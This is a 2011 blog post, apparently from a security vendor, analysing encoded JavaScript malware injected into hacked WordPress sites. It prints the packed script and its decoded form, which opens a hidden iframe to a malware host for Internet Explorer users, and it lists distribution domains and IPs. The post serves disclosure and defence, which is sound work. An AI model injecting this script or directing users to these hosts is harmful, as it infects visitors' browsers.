New Malware – eval(function(p,a,c,k,e,d)

Posted on November 4, 2011 by sucuri-research
We are seeing many WordPress sites on shared hosts getting compromised with an encoded javascript malware (using Dean Edwards packer). This is what is gets added to the hacked sites:
 
<script>eval(function(p,a,c,k,e,d){e=function(c) {return(c<a?”:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))}; if(!”.replace(/^/,String)){while(c–){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}]; e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’ \\b’,'g’),k[c])}}return p}(‘i 9(){a=6.h(\’b\’);7(!a){5 0=6.j(\’k\’);6.g.l(0); .. 9()",y)}’,41,41,’el||ua|indexOf|style|var|document|if|1px| MakeFrameEx|element|yahoo_api|height| width|display|none|body|getElementById|function|createElement| iframe|appendChild|src|id|c0m|msie| toLowerCase|opera|webtv||setTimeout|windows|http|userAgent| 1000|hdghdg|navigator|li|showthread|php| 72241732′.split(‘|’),0,{}))
And that code (once decoded by the browser) is used to generate an iframe where more malware is loaded and used to infect the browser of the person visiting the compromised web site.
 
This is the code decoded:
function MakeFrameEx(){element=document.getElementById(‘yahoo_api’);if(!element){var el=document.createElement(‘iframe’);document.bo dy.appendChild(el);el.id=’yahoo_api’;el.style.display=’none’; el.src=’http://hdghd.c0m.li/showthread.php?t=72241732‘}}var  ua=navigator.userAgent.toLowerCase();if(((ua.indexOf("msie")!=-1&&ua.indexOf("opera")==-1&&ua.indexOf("webtv")==-1))&&ua.indexOf("windows")!=-1){var t=setTimeout("MakeFrameEx()",1000)}
Some domains being used to distribute the malware:
 
bdfzghdfh.nl.ai
chief-bagel.xe.cx
hdghd.c0m.li
probable-waitress.mypicture.info
http://dwrewr.c0m.li/showthread.php?t=68791819 (178.18.87.141)
http://chief-bagel.xe.cx/showthread.php?t=68791819 (95.163.66.209)
http://coldsoup.got-game.org/showthread.php?t=68791819 (95.163.66.209)
http://probable-waitress.mypicture.info/showthread.php?t=687918.. (95.163.66.209)
http://poorwine.freewww.biz/showthread.php?t=68791819 (95.163.66.209)
http://sockscape.gv.vg/showthread.php?t=50170030
http://simincc.co.be/showthread.php?t=10170030
http://krrrdid.co.cc/showthread.php?t=60170030

 
If your site is compromised, sign up with us and we will fix it for you: http://sucuri.net/signup
 

This entry was posted in blacklisted, hacked, malware, security, wordpress. Bookmark the permalink.

Comments are closed.